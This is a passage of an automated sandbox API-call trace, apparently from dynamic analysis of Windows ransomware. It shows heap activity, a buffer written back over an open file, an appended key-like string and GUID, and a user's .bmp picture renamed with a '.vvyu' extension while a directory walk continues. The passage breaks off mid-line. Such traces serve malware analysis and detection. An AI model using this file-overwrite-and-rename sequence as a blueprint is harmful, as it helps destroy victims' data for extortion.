dwFlags=0x0) returned 1 [0201.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.926] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0201.926] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0201.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.926] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0201.926] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0201.926] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x61a0) returned 0x2ea99b0 [0201.926] SetFilePointer (in: hFile=0x510, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0201.927] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0c3c8 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e90080 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3530 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e900c8 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3548 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3590 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0201.927] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0201.928] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aa80 [0201.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0201.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0201.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0201.928] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0201.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0201.928] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3590 [0201.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea3578 [0201.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0201.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0201.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0201.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0201.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0201.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0201.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85ac8 [0201.929] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a00 [0201.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.929] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0201.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.930] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0201.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aa80 | out: hHeap=0x620000) returned 1 [0201.931] GetCurrentThreadId () returned 0x66c [0201.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0201.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea8e08 [0201.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9728 [0201.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c300 [0201.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0201.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0201.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0201.931] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.931] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.931] GetCurrentThreadId () returned 0x66c [0201.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2c73318 [0201.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.932] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.932] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0201.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0201.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c73318 | out: hHeap=0x620000) returned 1 [0201.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e960b0 [0201.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaa80 [0201.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0201.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0201.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35d8 [0201.933] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0201.933] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3578 [0201.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0201.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3590 [0201.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0201.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3560 [0201.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35f0 [0201.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0201.934] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0201.934] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35c0 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea35a8 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3608 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea35a8 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35c0 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3578 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35d8 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3608 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0201.935] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0201.935] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0201.936] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3578 | out: hHeap=0x620000) returned 1 [0201.936] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0201.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0201.937] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0201.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0201.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c300 | out: hHeap=0x620000) returned 1 [0201.937] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e960b0 | out: hHeap=0x620000) returned 1 [0201.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0201.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0201.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0201.938] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0201.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0201.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0201.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35a8 | out: hHeap=0x620000) returned 1 [0201.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0201.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea35f0 | out: hHeap=0x620000) returned 1 [0201.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0201.939] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3590 | out: hHeap=0x620000) returned 1 [0201.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3560 | out: hHeap=0x620000) returned 1 [0201.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0201.940] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9728 | out: hHeap=0x620000) returned 1 [0201.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0201.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3548 | out: hHeap=0x620000) returned 1 [0201.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e900c8 | out: hHeap=0x620000) returned 1 [0201.941] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0201.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0201.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaa80 | out: hHeap=0x620000) returned 1 [0201.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0201.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0201.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a00 | out: hHeap=0x620000) returned 1 [0201.942] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85ac8 | out: hHeap=0x620000) returned 1 [0201.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0201.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0c3c8 | out: hHeap=0x620000) returned 1 [0201.943] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0201.944] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0201.944] WriteFile (in: hFile=0x510, lpBuffer=0x2ea99b0*, nNumberOfBytesToWrite=0x619d, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea99b0*, lpNumberOfBytesWritten=0x312fb14*=0x619d, lpOverlapped=0x0) returned 1 [0201.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea99b0 | out: hHeap=0x620000) returned 1 [0201.945] SetFilePointerEx (in: hFile=0x510, liDistanceToMove=0x61a2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0201.945] WriteFile (in: hFile=0x510, lpBuffer=0x2e95ea0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95ea0*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0201.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0201.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0201.945] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0201.945] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0201.945] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4998 | out: hHeap=0x620000) returned 1 [0201.946] WriteFile (in: hFile=0x510, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0201.946] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0201.946] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0201.946] WriteFile (in: hFile=0x510, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0201.947] CloseHandle (hObject=0x510) returned 1 [0201.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xb0) returned 0x2c2df40 [0201.948] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8c0) returned 0x2ea6a68 [0201.948] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c2df40 | out: hHeap=0x620000) returned 1 [0201.948] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\X5TjkQT17l1kq.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\x5tjkqt17l1kq.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\KiR-tAs9lgdEh FXubwY\\yDPh4CpXgP3QwyUC\\X5TjkQT17l1kq.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\kir-tas9lgdeh fxubwy\\ydph4cpxgp3qwyuc\\x5tjkqt17l1kq.bmp.vvyu")) returned 1 [0201.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0201.950] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0201.950] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0201.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6e2d18 | out: hHeap=0x620000) returned 1 [0201.953] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xacb941c0, ftCreationTime.dwHighDateTime=0x1d897d5, ftLastAccessTime.dwLowDateTime=0x29b26f10, ftLastAccessTime.dwHighDateTime=0x1d89a3a, ftLastWriteTime.dwLowDateTime=0x29b26f10, ftLastWriteTime.dwHighDateTime=0x1d89a3a, nFileSizeHigh=0x0, nFileSizeLow=0x61a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="X5TjkQT17l1kq.bmp", cAlternateFileName="X5TJKQ~1.BMP")) returned 0 [0201.953] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0201.953] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd96b8 | out: hHeap=0x620000) returned 1 [0201.954] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91678 | out: hHeap=0x620000) returned 1 [0201.954] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0201.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4998 [0201.954] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0201.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.954] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.955] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.955] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.956] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.956] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.957] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.957] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0201.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.958] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0201.958] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.959] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e8e298 [0201.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0201.959] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e8e298 | out: hHeap=0x620000) returned 1 [0201.960] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4728 | out: hHeap=0x620000) returned 1 [0201.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4728 [0201.960] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0201.960] HeapFree (in: 